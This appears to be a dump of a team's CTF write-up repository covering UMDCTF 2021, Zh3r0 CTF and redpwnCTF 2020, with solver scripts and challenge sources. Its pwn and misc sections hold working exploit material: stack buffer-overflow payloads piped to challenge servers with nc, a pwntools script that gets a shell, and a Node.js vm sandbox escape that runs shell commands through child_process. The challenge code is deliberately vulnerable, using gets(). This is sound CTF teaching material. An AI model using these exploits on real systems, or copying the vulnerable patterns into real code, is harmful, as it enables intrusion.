-------------------------------------------------------------------------------- 1 | # Not Slick - Forensics 2 | Author - [BlackJack](http://github.com/Mannan-Goyal) 3 | 4 | Requirements : Basic knowledge of Hex, the structure of png files and the magic number 5 | 6 | --- 7 | When we start to solve the challenge we are faced with a problem description which says - 8 | 9 | > My friend always messes with PNGs.... what did he do this time? 10 | 11 | This gives us a pretty good idea about the png file being messed up 12 | 13 | After this I open the png file with a normal image viewer just to confirm the fact. 14 | Now I open the image with Bless Hex Editor, However u can use any hex editor of your choice. A list of popular hex editors can be found [here.](https://linuxhint.com/hex_editor_linux/) 15 | 16 | The magic number for a png file : ```89 50 4E 47 .PNG``` 17 | 18 | A list of magic numbers for different file types can be found [here.](https://asecuritysite.com/forensics/magic) 19 | 20 | After looking at the hex of the image 21 | ![Init Hex](https://i.imgur.com/5IdSmiT.png) 22 | 23 | I saw that the initial hex didn't match the magic number of png so I edited it to that but that didn't work 24 | 25 | Later, i realised when I scrolled to the bottom of the file 26 | ![End hex](https://i.imgur.com/xEewiKu.png) 27 | that the PNG and IHDR is inverted and hence the whole file was actually inverted 28 | 29 | So we wrote a python script to re-invert the file 30 | ```python 31 | f1 = open("notslick.png", "rb+") 32 | f2 = open("out.png", "wb+") 33 | f2.write(f1.read()[::-1]) 34 | f1.close() 35 | f2.close() 36 | ``` 37 | (Credits: [UnknownAbyss](https://github.com/unknownabyss)) 38 | 39 | After this when you open the image you find the flag which is - 40 | ![flag](https://i.imgur.com/TOprNZ6.png) 41 | (Disable Dark Mode to view image xD) 42 | 43 | ```UMDCTF-{abs01ute1y_r3v3r53d}``` 44 | -------------------------------------------------------------------------------- /UMDCTF 2021/stegnography/pickle_rick.md: -------------------------------------------------------------------------------- 1 | # Pickle Rick - Stegnography 2 | Author - [BlackJack](http://github.com/Mannan-Goyal) 3 | 4 | Requirements : binwalk, steghide or not 5 | 6 | --- 7 | When we start to solve the challenge we are faced with a problem description which says - 8 | 9 | > You recieve these audio files from someone named Alan Eliasen. 10 | 11 | After reading this statement we get 2 key hints, one that we have to find hidden messages in audio files and a name - Alan Eliasen. 12 | 13 | If you google the name you'll reach [here.](https://futureboy.us/) 14 | 15 | Here given the category of the challenge we select Stegnography and then Decode an Image to reach [here.](https://futureboy.us/stegano/) 16 | 17 | ![Upload](https://i.imgur.com/m3xP0kS.png) 18 | 19 | After this we uploaded the ```together-forever-encoded.wav``` file in the decoder, we get the following string displayed - 20 | 21 | ```The password is "big_chungus"!``` 22 | 23 | Now we upload the 2nd file to the website but this time instead of leaving the password field empty we put big_chungus there. 24 | 25 | The following is obtained- 26 | ```UMDCTF-{n3v3r_g0nna_l3t_y0u_d0wn}``` 27 | which is the required flag. 28 | 29 | The above method was suggested later by [Rakesh](https://github.com/Rakesh1772) but to solve the challenge earlier I had used steghide, the commands I ran are listed below 30 | 31 | ```bash 32 | steghide extract -sf together-forever-encoded.wav 33 | steghide extract -sf rickroll.wav 34 | ``` 35 | -------------------------------------------------------------------------------- /Zh3r0 CTF/Pwn/Command 1/README.md: -------------------------------------------------------------------------------- 1 | # Command 1 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | This is an alternate solution to this challenge. The intended solution is not written here. 6 | 7 | # Requirements 8 | 9 | - None 10 | 11 | # Source 12 | 13 | - [command_1](./command_1) 14 | 15 | # Exploitation 16 | 17 | The challenge was intended to be a binary exploit challenge, however, due to a small issue, there was another bug in it. So, when you decompile the code using `ghidra`, you see that the `Add command` option uses `strstr` to block certain strings in the input. But, the same ones are not blocked in the `Edit command` option. The solution seems simple :laugh:. 18 | 19 | solution 20 | -------------------------------------------------------------------------------- /Zh3r0 CTF/Pwn/Command 1/command_1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Zh3r0 CTF/Pwn/Command 1/command_1 -------------------------------------------------------------------------------- /Zh3r0 CTF/Pwn/Command 1/static/img1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Zh3r0 CTF/Pwn/Command 1/static/img1.png -------------------------------------------------------------------------------- /Zh3r0 CTF/Pwn/Free Flag/README.md: -------------------------------------------------------------------------------- 1 | # Free Flag 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | This is a simple buffer overflow challenge where you have to overwrite the return pointer. 6 | 7 | # Requirements 8 | 9 | - GDB 10 | - Knowledge of Function Stack, Return Pointer 11 | 12 | # Source 13 | 14 | - [chall](./chall) 15 | 16 | # Exploitation 17 | 18 | This is a classic buffer overflow challenge. The flag is in a file on the server, and a binary is given to you ([chall](./chall)). Fire up GDB, and check out the main function using `disas main`. 19 |
20 | 21 | pdisas main 22 | 23 | You see a function called `here`. We check it out using `disas here`. 24 |
25 | 26 | pdisas here 27 | 28 | In this you see a call to the `read` function. Also, when you do `info functions`, notice there is a function called `win_win`. Let's check that out. 29 |
30 | 31 | flag 32 | 33 | So the `win_win` function has a has a call to `system`, looks like this is our target function. If we can run this somehow, we get the flag. So we try to overwrite the return pointer in the `here` function. You see that the size of the stack is `0x20` or `32`. We need to add 8 more bytes to overwrite the saved base pointer, making it 40. Then, the return pointer must be overwritten in little endian to the `win_win` function. Let's write the payload. 34 | 35 | ```bash 36 | python2 -c "print('a'*(32+8) + '\x08\x07\x40\x00\x00\x00\x00\x00')" 37 | ``` 38 | 39 | This can now be piped to the server to get the flag. 40 | 41 | ```bash 42 | python2 -c "print('a'*40 + '\x08\x07\x40\x00\x00\x00\x00\x00')" | nc asia.pwn.zh3r0.ml 3456 43 | ``` 44 | 45 | flag 46 | 47 | The flag is: 48 | 49 | ``` 50 | zh3r0{welcome_to_zh3r0_ctf} 51 | ``` -------------------------------------------------------------------------------- /Zh3r0 CTF/Pwn/Free Flag/chall: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Zh3r0 CTF/Pwn/Free Flag/chall -------------------------------------------------------------------------------- /Zh3r0 CTF/Pwn/Free Flag/static/img1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Zh3r0 CTF/Pwn/Free Flag/static/img1.png -------------------------------------------------------------------------------- /Zh3r0 CTF/Pwn/Free Flag/static/img2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Zh3r0 CTF/Pwn/Free Flag/static/img2.png -------------------------------------------------------------------------------- /Zh3r0 CTF/Pwn/Free Flag/static/img3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Zh3r0 CTF/Pwn/Free Flag/static/img3.png -------------------------------------------------------------------------------- /Zh3r0 CTF/Pwn/Free Flag/static/img4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Zh3r0 CTF/Pwn/Free Flag/static/img4.png -------------------------------------------------------------------------------- /Zh3r0 CTF/README.md: -------------------------------------------------------------------------------- 1 | # Zh3r0 CTF 2 | 3 | - Official URL: https://ctf.zh3r0.ml/ 4 | - Format: Jeopardy 5 | - Duration: Mon, 15 June 2020, 21:00 IST — Wed, 17 June 2020, 21:00 IST -------------------------------------------------------------------------------- /Zh3r0 CTF/Reversing/snakes everywhere/guess.py: -------------------------------------------------------------------------------- 1 | flag = 'zh3ro{fake flag}' 2 | key = 'I_l0v3_r3v3r51ng' 3 | 4 | # flag size is 38 5 | 6 | def xor(str1, str2): 7 | return chr(ord(str1)^ord(str2)) 8 | 9 | ciphertext = '' 10 | 11 | for i in range(len(flag)//3): 12 | ciphertext += chr(ord(key[i]) * ord(flag[i]) - i) 13 | 14 | 15 | for i in range(len(flag)//3, len(flag)//3 * 2): 16 | ciphertext += chr( ord(flag[i]) * ord(key[i%len(key)]) + i) 17 | 18 | for i in range(len(key)//2, len(flag)): 19 | ciphertext += xor(key[i%16], flag[i]) 20 | 21 | file = open('ciphertext.txt', 'w') 22 | print(len(ciphertext)) 23 | 24 | file.write(ciphertext) 25 | file.close() 26 | -------------------------------------------------------------------------------- /Zh3r0 CTF/Reversing/snakes everywhere/rev.py: -------------------------------------------------------------------------------- 1 | def xor(str1, str2): 2 | return chr(ord(str1)^ord(str2)) 3 | 4 | flag = [None]*38 5 | key = 'I_l0v3_r3v3r51ng' 6 | 7 | ciphertext = open('snake.txt').read() 8 | 9 | k = len(ciphertext) - (len(flag) - len(key)//2) 10 | 11 | for i in range(len(key)//2, len(flag)): 12 | flag[i] = xor(key[i%16], ciphertext[k]) 13 | k += 1 14 | 15 | for i in range(len(flag)//3, len(flag)//3 * 2): 16 | flag[i] = chr((ord(ciphertext[i]) - i)//ord(key[i%len(key)])) 17 | 18 | 19 | for i in range(len(flag)//3): 20 | flag[i] = chr((ord(ciphertext[i]) + i)//ord(key[i])) 21 | 22 | print(''.join(flag)) -------------------------------------------------------------------------------- /Zh3r0 CTF/Reversing/snakes everywhere/snake.txt: -------------------------------------------------------------------------------- 1 | ⋊⚗ᖂᕝᘜ᡼ᶪ㗛᜔⿧ᘓヱᎷጱ⴬⹔᮹⪾ゖণ㉒᎛⠪㗹G\jU(,Q3 l@RCXCN -------------------------------------------------------------------------------- /Zh3r0 CTF/Web/Google Source Code/README.md: -------------------------------------------------------------------------------- 1 | # Challenge Name 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | Brief Description 6 | 7 | # Requirements 8 | 9 | - PHP Local File Inclusion (LFI) 10 | 11 | # Source 12 | 13 | - http://web.zh3r0.ml:7777/ 14 | - The description on the website mentions `page` and `upload`. 15 | 16 | # Exploitation 17 | 18 | The first part of the challenge is a sort of vague guesswork. In the challenge description, there are two words - `page` and `upload` - which the author wants you to notice. Also, when you view the homepage source, it has a comment ``. 19 |
20 | 21 | comment 22 | 23 | So, the first try was to pass a query `page` in the flag. So, we tried to visit `http://web.zh3r0.ml:7777/?page=flag`. Here, we get a gif. 24 |
25 | 26 | Now, since the description had the word `upload` in it, we tried to checkout if there is a page called upload, and there was! 27 |
28 | 29 | upload 30 | 31 | Here, we can assume that we have to do some sort of local file inclusion. So we created a file called `payload.php`, and tried to `ls` the directory. We saw a lot of files called `flag`, so we just decided to print all files and just search on the browser. Here's the final payload: 32 | 33 | ```php 34 | 37 | ``` 38 | 39 | Now you can visit the route `/?page=payload` (name of the file you uploaded). This gives a page with a lot of stuff. 40 |
41 | 42 | page 43 | 44 | So, the contents of all the files are now on the browser. All you have to do is open the source code and search for the flag format. 45 |
46 | 47 | flag 48 | 49 | The flag is: 50 | 51 | ``` 52 | zh3r0{h3y_d1d_y0u_upl04d_php_c0rr3ct1y???_84651320} 53 | ``` 54 | -------------------------------------------------------------------------------- /Zh3r0 CTF/Web/Google Source Code/payload.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Zh3r0 CTF/Web/Google Source Code/static/img1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Zh3r0 CTF/Web/Google Source Code/static/img1.png -------------------------------------------------------------------------------- /Zh3r0 CTF/Web/Google Source Code/static/img2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Zh3r0 CTF/Web/Google Source Code/static/img2.png -------------------------------------------------------------------------------- /Zh3r0 CTF/Web/Google Source Code/static/img3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Zh3r0 CTF/Web/Google Source Code/static/img3.png -------------------------------------------------------------------------------- /Zh3r0 CTF/Web/Google Source Code/static/img4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Zh3r0 CTF/Web/Google Source Code/static/img4.png -------------------------------------------------------------------------------- /redpwnCTF 2020/README.md: -------------------------------------------------------------------------------- 1 | # redpwnCTF 2020 2 | 3 | - Official URL: https://2020.redpwn.net/ 4 | - Format: Jeopardy 5 | - Duration: Mon, 22 June 2020, 01:30 IST — Fri, 26 June 2020, 01:30 IST -------------------------------------------------------------------------------- /redpwnCTF 2020/crypto/12-shades-of-redpwn/README.md: -------------------------------------------------------------------------------- 1 | # 12-shades-of-redpwn 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | Color wheel, base 12. 6 | 7 | # Requirements 8 | 9 | - Base 12 10 | 11 | # Source 12 | 13 | - [ciphertext.jpg](./ciphertext.jpg) 14 | - [color-wheel.jpg](./color-wheel.jpg) 15 | 16 | # Exploitation 17 | 18 | Identify the colors from the ciphertext in the color-wheel, and use numbers 0-11 to write them (like in a clock). 19 | 20 | ``` 21 | 86 90 81 87 a3 49 99 43 97 97 41 92 49 7b 41 97 7a 44 92 7a 44 96 98 a5 22 | ``` 23 | 24 | These are basically the values in base 12. Convert them to base 10, and then treat the values obtained as ASCII. 25 | 26 | ```python 27 | >>> x = "86 90 81 87 a3 49 99 43 97 97 41 92 49 7b 41 97 7a 44 92 7a 44 96 98 a5" 28 | >>> ''.join(list(map(lambda i: chr(int(i,12)), x.split()))) 29 | 'flag{9u3ss1n9_1s^4n^4rt}' 30 | ``` 31 | 32 | Maybe we read some colors wrong? Replace the `^`s with `_`s. 33 |
34 | 35 | The flag is: 36 | 37 | ``` 38 | flag{9u3ss1n9_1s_4n_4rt} 39 | ``` -------------------------------------------------------------------------------- /redpwnCTF 2020/crypto/12-shades-of-redpwn/ciphertext.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/redpwnCTF 2020/crypto/12-shades-of-redpwn/ciphertext.jpg -------------------------------------------------------------------------------- /redpwnCTF 2020/crypto/12-shades-of-redpwn/color-wheel.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/redpwnCTF 2020/crypto/12-shades-of-redpwn/color-wheel.jpg -------------------------------------------------------------------------------- /redpwnCTF 2020/crypto/12-shades-of-redpwn/sol: -------------------------------------------------------------------------------- 1 | 86 90 81 87 a3 49 99 43 97 97 41 92 49 7b 41 97 7a 44 92 7a 44 96 98 a5 2 | -------------------------------------------------------------------------------- /redpwnCTF 2020/crypto/4k-rsa/4k-rsa-public-key.txt: -------------------------------------------------------------------------------- 1 | n: 5028492424316659784848610571868499830635784588253436599431884204425304126574506051458282629520844349077718907065343861952658055912723193332988900049704385076586516440137002407618568563003151764276775720948938528351773075093802636408325577864234115127871390168096496816499360494036227508350983216047669122408034583867561383118909895952974973292619495653073541886055538702432092425858482003930575665792421982301721054750712657799039327522613062264704797422340254020326514065801221180376851065029216809710795296030568379075073865984532498070572310229403940699763425130520414160563102491810814915288755251220179858773367510455580835421154668619370583787024315600566549750956030977653030065606416521363336014610142446739352985652335981500656145027999377047563266566792989553932335258615049158885853966867137798471757467768769820421797075336546511982769835420524203920252434351263053140580327108189404503020910499228438500946012560331269890809392427093030932508389051070445428793625564099729529982492671019322403728879286539821165627370580739998221464217677185178817064155665872550466352067822943073454133105879256544996546945106521271564937390984619840428052621074566596529317714264401833493628083147272364024196348602285804117877 2 | e: 65537 3 | c: 3832859959626457027225709485375429656323178255126603075378663780948519393653566439532625900633433079271626752658882846798954519528892785678004898021308530304423348642816494504358742617536632005629162742485616912893249757928177819654147103963601401967984760746606313579479677305115496544265504651189209247851288266375913337224758155404252271964193376588771249685826128994580590505359435624950249807274946356672459398383788496965366601700031989073183091240557732312196619073008044278694422846488276936308964833729880247375177623028647353720525241938501891398515151145843765402243620785039625653437188509517271172952425644502621053148500664229099057389473617140142440892790010206026311228529465208203622927292280981837484316872937109663262395217006401614037278579063175500228717845448302693565927904414274956989419660185597039288048513697701561336476305496225188756278588808894723873597304279725821713301598203214138796642705887647813388102769640891356064278925539661743499697835930523006188666242622981619269625586780392541257657243483709067962183896469871277059132186393541650668579736405549322908665664807483683884964791989381083279779609467287234180135259393984011170607244611693425554675508988981095977187966503676074747171 4 | -------------------------------------------------------------------------------- /redpwnCTF 2020/crypto/base646464/README.md: -------------------------------------------------------------------------------- 1 | # base646464 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | Base 64, base 64, base 64 ... 25 times. 6 | 7 | # Requirements 8 | 9 | - Basic Knowledge of Node.js 10 | 11 | # Source 12 | 13 | - [generate.js](./generate.js) 14 | - [cipher.txt](./cipher.txt) 15 | 16 | # Exploitation 17 | 18 | You have to decode base64 25 times. 19 | 20 | ```javascript 21 | // Flag is base 64 encoded 25 times 22 | let ret = flag; 23 | for(let i = 0; i < 25; i++) ret = btoa(ret); 24 | ``` 25 | 26 | Of course, you can use bash XD: 27 | 28 | ```bash 29 | cat cipher.txt | base64 -d | base64 -d |base64 -d | base64 -d 30 | | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | ba 31 | se64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 32 | -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d 33 | | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d 34 | flag{l00ks_l1ke_a_l0t_of_64s} 35 | ``` 36 | 37 | You can use python too: 38 | 39 | ```python 40 | >>> f = open('cipher.txt').read() 41 | >>> import base64 42 | >>> for i in range(25): 43 | ... f = base64.b64decode(f) 44 | ... 45 | >>> print(f) 46 | b'flag{l00ks_l1ke_a_l0t_of_64s}' 47 | ``` 48 | 49 | The flag is: 50 | 51 | ``` 52 | flag{l00ks_l1ke_a_l0t_of_64s} 53 | ``` -------------------------------------------------------------------------------- /redpwnCTF 2020/crypto/base646464/generate.js: -------------------------------------------------------------------------------- 1 | const btoa = str => Buffer.from(str).toString('base64'); 2 | 3 | const fs = require("fs"); 4 | const flag = fs.readFileSync("flag.txt", "utf8").trim(); 5 | 6 | let ret = flag; 7 | for(let i = 0; i < 25; i++) ret = btoa(ret); 8 | 9 | fs.writeFileSync("cipher.txt", ret); 10 | -------------------------------------------------------------------------------- /redpwnCTF 2020/crypto/pseudo-key/crack.py: -------------------------------------------------------------------------------- 1 | from string import ascii_lowercase 2 | 3 | chr_to_num = {c: i for i, c in enumerate(ascii_lowercase)} 4 | 5 | num_to_chr = {i: c for i, c in enumerate(ascii_lowercase)} 6 | ctxt = 'z_jjaoo_rljlhr_gauf_twv_shaqzb_ljtyut' 7 | pseudo_key = 'iigesssaemk' 8 | 9 | def get_key(pkey): 10 | x = '' 11 | y = '' 12 | for i in range(len(pkey)): 13 | c = chr_to_num[pkey[i]] 14 | x += num_to_chr[c/2] 15 | y += num_to_chr[(c+26)/2] 16 | print(x) 17 | print(y) 18 | 19 | get_key(pseudo_key) 20 | 21 | key = 'redpwwwnctf' 22 | 23 | def decrypt(ct, key): 24 | flag = '' 25 | key = ''.join(key[i % len(key)] for i in range(len(ct))).lower() 26 | for i in range(len(ct)): 27 | if ct[i] == '_': 28 | flag += '_' 29 | continue 30 | flag += num_to_chr[(chr_to_num[ct[i]] - chr_to_num[key[i]]) % 26] 31 | print(flag) 32 | decrypt(ctxt, key) -------------------------------------------------------------------------------- /redpwnCTF 2020/crypto/pseudo-key/pseudo-key-output.txt: -------------------------------------------------------------------------------- 1 | Ciphertext: z_jjaoo_rljlhr_gauf_twv_shaqzb_ljtyut 2 | Pseudo-key: iigesssaemk 3 | -------------------------------------------------------------------------------- /redpwnCTF 2020/crypto/pseudo-key/pseudo-key.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from string import ascii_lowercase 4 | 5 | chr_to_num = {c: i for i, c in enumerate(ascii_lowercase)} 6 | num_to_chr = {i: c for i, c in enumerate(ascii_lowercase)} 7 | 8 | def encrypt(ptxt, key): 9 | ptxt = ptxt.lower() 10 | key = ''.join(key[i % len(key)] for i in range(len(ptxt))).lower() 11 | ctxt = '' 12 | for i in range(len(ptxt)): 13 | if ptxt[i] == '_': 14 | ctxt += '_' 15 | continue 16 | x = chr_to_num[ptxt[i]] 17 | y = chr_to_num[key[i]] 18 | ctxt += num_to_chr[(x + y) % 26] 19 | return ctxt 20 | 21 | with open('flag.txt') as f, open('key.txt') as k: 22 | flag = f.read() 23 | key = k.read() 24 | 25 | ptxt = flag[5:-1] 26 | 27 | ctxt = encrypt(ptxt,key) 28 | pseudo_key = encrypt(key,key) 29 | 30 | print('Ciphertext:',ctxt) 31 | print('Pseudo-key:',pseudo_key) 32 | -------------------------------------------------------------------------------- /redpwnCTF 2020/misc/CaaSINO/README.md: -------------------------------------------------------------------------------- 1 | # Challenge Name 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | Node.js `vm` module exploit. 6 | 7 | # Requirements 8 | 9 | - Node.js 10 | 11 | # Source 12 | 13 | - [calculator.js](./calculator.js) 14 | 15 | ``` 16 | Who needs regex for sanitization when we have VMs?!?! 17 | 18 | The flag is at /ctf/flag.txt 19 | 20 | nc 2020.redpwnc.tf 31273 21 | ``` 22 | 23 | # Exploitation 24 | 25 | Not all programs that run in `vm`s are isolated. When you run this program, it shows 26 | 27 | ``` 28 | Welcome to my Calculator-as-a-Service (CaaS)! 29 | This calculator lets you use the full power of Javascript for 30 | your computations! Try `Math.log(Math.expm1(5) + 1)` 31 | Type q to exit. 32 | > 33 | ``` 34 | 35 | Now, you can pass anything as a string and it will be executed in the `vm.runInNewContext()` function. 36 | 37 | ```javascript 38 | const result = vm.runInNewContext(input) 39 | process.stdout.write(result + '\n') 40 | ``` 41 | 42 | So, we can simply get the process, require the `child_process` module, and execute `cat /ctf/flag.txt`. 43 | 44 | ```javascript 45 | const process = this.constructor.constructor('return this.process')();process.mainModule.require('child_process').execSync('cat /ctf/flag.txt').toString() 46 | ``` 47 | 48 | The flag is: 49 | 50 | ``` 51 | flag{vm_1snt_s4f3_4ft3r_41l_29ka5sqD} 52 | ``` 53 | -------------------------------------------------------------------------------- /redpwnCTF 2020/misc/CaaSINO/calculator.js: -------------------------------------------------------------------------------- 1 | const vm = require('vm') 2 | const readline = require('readline') 3 | 4 | const rl = readline.createInterface({ 5 | input: process.stdin, 6 | output: process.stdout 7 | }) 8 | 9 | process.stdout.write('Welcome to my Calculator-as-a-Service (CaaS)!\n') 10 | process.stdout.write('This calculator lets you use the full power of Javascript for\n') 11 | process.stdout.write('your computations! Try `Math.log(Math.expm1(5) + 1)`\n') 12 | process.stdout.write('Type q to exit.\n') 13 | rl.prompt() 14 | rl.addListener('line', (input) => { 15 | if (input === 'q') { 16 | process.exit(0) 17 | } else { 18 | try { 19 | const result = vm.runInNewContext(input) 20 | process.stdout.write(result + '\n') 21 | } catch { 22 | process.stdout.write('An error occurred.\n') 23 | } 24 | rl.prompt() 25 | } 26 | }) 27 | -------------------------------------------------------------------------------- /redpwnCTF 2020/pwn/coffer-overflow-0/README.md: -------------------------------------------------------------------------------- 1 | # coffer-overflow-0 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | This is a simple buffer overflow challenge. 6 | 7 | # Requirements 8 | 9 | - Basic Buffer overflow. 10 | 11 | # Source 12 | 13 | - [coffer-overflow-0](./coffer-overflow-0). 14 | 15 | ``` 16 | Can you fill up the coffers? We even managed to find the source for you. 17 | 18 | nc 2020.redpwnc.tf 31199 19 | ``` 20 | 21 | ```c 22 | #include 23 | #include 24 | 25 | int main(void) 26 | { 27 | long code = 0; 28 | char name[16]; 29 | 30 | setbuf(stdout, NULL); 31 | setbuf(stdin, NULL); 32 | setbuf(stderr, NULL); 33 | 34 | puts("Welcome to coffer overflow, where our coffers are overfilling with bytes ;)"); 35 | puts("What do you want to fill your coffer with?"); 36 | 37 | gets(name); 38 | 39 | if(code != 0) { 40 | system("/bin/sh"); 41 | } 42 | } 43 | ``` 44 | 45 | # Exploitation 46 | 47 | The goal is clear, we have to somehow set a non-zero value in `code`. 48 |
49 | 50 | We see in the code snippet that `name` is alloted 16 bytes, and `code` is alloted 8 bytes (long, 64-bit). Also, the `gets()` function is used, which does not check the size of the input. So, we can simply write past the space alloted for `name` and write into `code`. 51 |
52 | 53 | Space in the stack is generally assigned in multiples of 16, so for this function, 32 bits will be assigned. We can simply fill this with `a`s, each `a` being 1 byte, and fill up everything, thus changing the value of `code` as well. We get a shell. 54 | 55 | ```bash 56 | $ python2 -c "print 'a'*32" 57 | aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 58 | 59 | $ nc 2020.redpwnc.tf 31199 60 | Welcome to coffer overflow, where our coffers are overfilling with bytes ;) 61 | What do you want to fill your coffer with? 62 | aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 63 | ls 64 | Makefile 65 | bin 66 | coffer-overflow-0 67 | coffer-overflow-0.c 68 | dev 69 | flag.txt 70 | lib 71 | lib32 72 | lib64 73 | cat flag.txt 74 | flag{b0ffer_0verf10w_3asy_as_123} 75 | ``` 76 | 77 | The flag is: 78 | 79 | ``` 80 | flag{b0ffer_0verf10w_3asy_as_123} 81 | ``` -------------------------------------------------------------------------------- /redpwnCTF 2020/pwn/coffer-overflow-0/coffer-overflow-0: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/redpwnCTF 2020/pwn/coffer-overflow-0/coffer-overflow-0 -------------------------------------------------------------------------------- /redpwnCTF 2020/pwn/coffer-overflow-0/coffer-overflow-0.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main(void) 5 | { 6 | long code = 0; 7 | char name[16]; 8 | 9 | setbuf(stdout, NULL); 10 | setbuf(stdin, NULL); 11 | setbuf(stderr, NULL); 12 | 13 | puts("Welcome to coffer overflow, where our coffers are overfilling with bytes ;)"); 14 | puts("What do you want to fill your coffer with?"); 15 | 16 | gets(name); 17 | 18 | if(code != 0) { 19 | system("/bin/sh"); 20 | } 21 | } 22 | 23 | -------------------------------------------------------------------------------- /redpwnCTF 2020/pwn/coffer-overflow-1/README.md: -------------------------------------------------------------------------------- 1 | # coffer-overflow-1 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | This is a simple buffer overflow challenge. 6 | 7 | # Requirements 8 | 9 | - Basic Buffer overflow. 10 | 11 | # Source 12 | 13 | - [coffer-overflow-1](./coffer-overflow-1). 14 | 15 | ``` 16 | The coffers keep getting stronger! You'll need to use the source, Luke. 17 | 18 | nc 2020.redpwnc.tf 31255 19 | ``` 20 | 21 | ```c 22 | #include 23 | #include 24 | 25 | int main(void) 26 | { 27 | long code = 0; 28 | char name[16]; 29 | 30 | setbuf(stdout, NULL); 31 | setbuf(stdin, NULL); 32 | setbuf(stderr, NULL); 33 | 34 | puts("Welcome to coffer overflow, where our coffers are overfilling with bytes ;)"); 35 | puts("What do you want to fill your coffer with?"); 36 | 37 | gets(name); 38 | 39 | if(code == 0xcafebabe) { 40 | system("/bin/sh"); 41 | } 42 | } 43 | ``` 44 | 45 | # Exploitation 46 | 47 | Check out [coffer-overflow-0](../coffer-overflow-0) for some details. You can checkout how buffer overflow works [here](https://github.com/csivitu/Incore-Sessions/blob/master/Buffer%20Overflow/Session-1.md). 48 |
49 | 50 | We see in the code snippet that `name` is alloted 16 bytes, and `code` is alloted 8 bytes (long, 64-bit). Also, the `gets()` function is used, which does not check the size of the input. So, we can simply write past the space alloted for `name` and write into `code`, the value `0xcafebabe` in little endian. 51 |
52 | 53 | We can use `pwntools` for the same. As discussed in `coffer-overflow-0`, this function will take up 32 bytes in the stack. The last 8 will store `code`, so we can write 24 random characters followed by `0xcafebabe` in little endian. 54 | 55 | ```python 56 | import pwn 57 | 58 | r = pwn.remote('2020.redpwnc.tf', 31255) 59 | 60 | rep = b'a'*24 + pwn.p64(0xcafebabe) 61 | print(rep) 62 | r.sendline(rep) 63 | r.interactive() 64 | ``` 65 | 66 | Run this program using `python`. 67 | 68 | ```bash 69 | $ python cof1.py 70 | [+] Opening connection to 2020.redpwnc.tf on port 31255: Done 71 | b'aaaaaaaaaaaaaaaaaaaaaaaa\xbe\xba\xfe\xca\x00\x00\x00\x00' 72 | [*] Switching to interactive mode 73 | Welcome to coffer overflow, where our coffers are overfilling with bytes ;) 74 | What do you want to fill your coffer with? 75 | $ ls 76 | Makefile 77 | bin 78 | coffer-overflow-1 79 | coffer-overflow-1.c 80 | dev 81 | flag.txt 82 | lib 83 | lib32 84 | lib64 85 | $ cat flag.txt 86 | flag{th1s_0ne_wasnt_pure_gu3ssing_1_h0pe} 87 | ``` 88 | 89 | The flag is: 90 | 91 | ``` 92 | flag{th1s_0ne_wasnt_pure_gu3ssing_1_h0pe} 93 | ``` -------------------------------------------------------------------------------- /redpwnCTF 2020/pwn/coffer-overflow-1/coffer-overflow-1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/redpwnCTF 2020/pwn/coffer-overflow-1/coffer-overflow-1 -------------------------------------------------------------------------------- /redpwnCTF 2020/pwn/coffer-overflow-1/coffer-overflow-1.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main(void) 5 | { 6 | long code = 0; 7 | char name[16]; 8 | 9 | setbuf(stdout, NULL); 10 | setbuf(stdin, NULL); 11 | setbuf(stderr, 